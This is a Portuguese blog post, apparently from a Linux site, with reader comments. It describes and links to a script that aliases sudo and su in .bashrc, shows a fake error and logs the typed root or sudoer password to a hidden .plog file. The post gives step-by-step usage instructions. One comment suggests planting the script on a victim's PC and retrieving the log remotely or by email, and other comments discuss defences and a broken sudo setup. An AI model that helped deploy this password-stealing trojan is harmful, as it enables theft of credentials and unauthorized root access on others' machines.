Obtenha a senha ROOT

Encontrei um script para alterar o .bashrc criando um alias para "sudo" e "su". não antes, sem fazer um backup do arquivo para restaurá-lo posteriormente.

O que ele faz é enviar uma mensagem de erro ao usar "sudo" ou "su" e capturar a senha em um log chamado ".plog" que está na casa.

Modo de uso

  1. Salve o script
  2. Dê a ele permissões de execução.
  3. Execute-o no terminal
  4. Feche o terminal
  5. Espera
  6. Em seguida, verifique o arquivo .plog. E deve haver a senha do root ou de algum usuário que esteja nos sudoers.

http://paste.desdelinux.net/4691

APRECIAR.


Deixe um comentário

Seu endereço de email não será publicado. Campos obrigatórios são marcados com *

*

*

  1. Responsável pelos dados: Miguel Ángel Gatón
  2. Finalidade dos dados: Controle de SPAM, gerenciamento de comentários.
  3. Legitimação: Seu consentimento
  4. Comunicação de dados: Os dados não serão comunicados a terceiros, exceto por obrigação legal.
  5. Armazenamento de dados: banco de dados hospedado pela Occentus Networks (UE)
  6. Direitos: A qualquer momento você pode limitar, recuperar e excluir suas informações.

  1.   v3on dito

    Por isso pessoal, a segurança física de nossa equipe não deve ser negligenciada

    1.    truko22 dito

      Isso mesmo, se o pc ficar emprestado por um momento, você tem que verificar os aliases 😀

  2.   Lolo dito

    Pergunta inocente:

    Como o script altera o .bashrc de um usuário não-self sudoer?

  3.   Blaire pascal dito

    Oo eu realmente gosto disso. Testando.

  4.   pacoeloyo dito

    Portanto, a segurança e a criptografia que usamos no GNU / Linux são inúteis? Acho que não, quem tentar deve comentar o resultado. Desde que usei este sistema, li que os níveis de criptografia no Linux são muito altos. As senhas são criptografadas usando algoritmos de redução criptográfica unilateral e agora descobri que um script simples ignora essa criptografia. Sinto muito, mas não acredito.

    1.    @Jlcmux dito

      Se funcionar, olhe. O que acontece é que o script cria um alias no .bashrc com sudo e su. E quando você digita su e / ou sudo. Ele lê o alias primeiro. não o comando como tal. então, quando você digita a senha, ele a coloca em um arquivo de texto normal. e então ele exclui o alias e permite que você use sudo ou su common. Quer dizer, é como um pipi. Não é que ele ignore a criptografia. é um login falso.

      1.    pacoeloyo dito

        Ok agora se entendi, já fiquei surpreso ao pular essa proteção para o torrera .. Obrigado por esclarecer isso.

        1.    Kikee dito

          Claro, mas o mais difícil continua sendo: fazer com que o script seja executado no PC da vítima, fazê-lo funcionar e coletar o arquivo remotamente ou enviá-lo por e-mail. Lá cada um terá que usar sua imaginação!

    2.    sempre dito

      Você exagerou muito pacoeloyo, eu acho. Este é um cavalo de Tróia simples, que exige que o usuário ignore várias medidas de segurança e a presença local do invasor. Isso existe em qualquer sistema operacional.
      Quanto ao script ... se não me engano, a maioria dos SUDOs atuais autentica com a senha do usuário, não a senha do root. Então a senha que seria obtida é a do usuário (presente nos sudoers).
      lembranças

      1.    @Jlcmux dito

        é com sudo ou su. Além disso, se um usuário pode usar o sudo, é porque ele está no sudoers e tem os mesmos privilégios que o root .. ou não?

        1.    sempre dito

          nem sempre, depende da configuração do sudoers. Enfim, o mais comum é que sim, você tem acesso total.
          O ponto é que as ações executadas usando sudo são geralmente registradas

      2.    diazepam dito

        simplesmente invocar "su" dá acesso à conta root.

  5.   ps dito

    Isso é muito perigoso se você usar boas senhas em salas de aula compartilhadas ou ambientes de oficina. Eles podem tocar para você. Bem, eles poderiam ter jogado ...

    Não adianta descobrir as senhas de um estranho, mas acho que basta de um conhecido.

    E lembre-se, a maioria duplica suas senhas ou usa padrões comuns. Nunca os subestime. Se vocês são bastardos é claro ...

  6.   maxixe dito

    Bem, eu não brinco ... Não tenho nada a esconder, nem mesmo as questões do exame final ... e se eu precisar de uma senha eu peço ... e tenho meus arquivos em um disco rígido externo .. .com um backup no meu laptop que fica no House.
    Devemos buscar simplicidade e praticidade, hoje estou vivo, amanhã não sei ... vivo hoje o resto é hora extra.

  7.   ferchmetal dito

    Vou manter isso em mente, obrigado.

  8.   Elinx dito

    Interessante!

  9.   Lolo dito

    Como esse script se copia no arquivo .bashrc do usuário sudoer?

    Se você tiver uma conta no computador, não poderá entrar na casa de outro usuário, a menos que tenha permissão e ainda duvido que possa modificar o .bashrc da vítima.

    Duvido muito que funcione, a menos que o usuário sudoer seja extremamente descuidado.

  10.   lex alexandre dito

    Temos que ter muito cuidado com esse clima!

  11.   Marcos dito

    Uma pergunta, se eu não tenho a senha de root, como posso dar permissão de execução do arquivo? Ou um usuário normal funciona?

    1.    @Jlcmux dito

      Claro. As permissões de execução não são exclusivas do root.

      1.    Alberto Aru dito

        AJUDA!
        depois de tentar, excluí .sudo_sd e não consigo encontrar nada no google (ou em outros mecanismos de pesquisa)

        1.    Alberto Aru dito

          Excluí o .plog e ele foi excluído automaticamente .sudo_sd e não consigo fazer login como root

          1.    Alberto Aru dito

            CORRIGIDO COMENTÁRIOS SOBRE ALIASES

  12.   Cartão dito

    Se isso funcionar em um MAC, vou vasculhar uma loja da Apple ... ei! mas apenas um pouco, não em um plano terrorista 😉

  13.   Atheus dito

    Entrada interessante

    Uma dúvida

    E se eu usar gksu ou equivalente no kde

    Ele também captura a senha

    lembranças

  14.   vida do capacete dito

    A execução deste script pode ser evitada dando permissão somente leitura para .bashrc

  15.   Blazek dito

    Testado, funciona, aunk tem suas limitações. Você sempre aprende coisas novas no Linux.

  16.   Alberto Aru dito

    Como posso reverter as alterações feitas? Excluí .plog e ele não me permite usar o sudo:
    bash: /home/alberto/.sudo_sd: O arquivo ou diretório não existe

    1.    Alberto Aru dito

      CORRIGIDO COMENTÁRIOS SOBRE ALIASES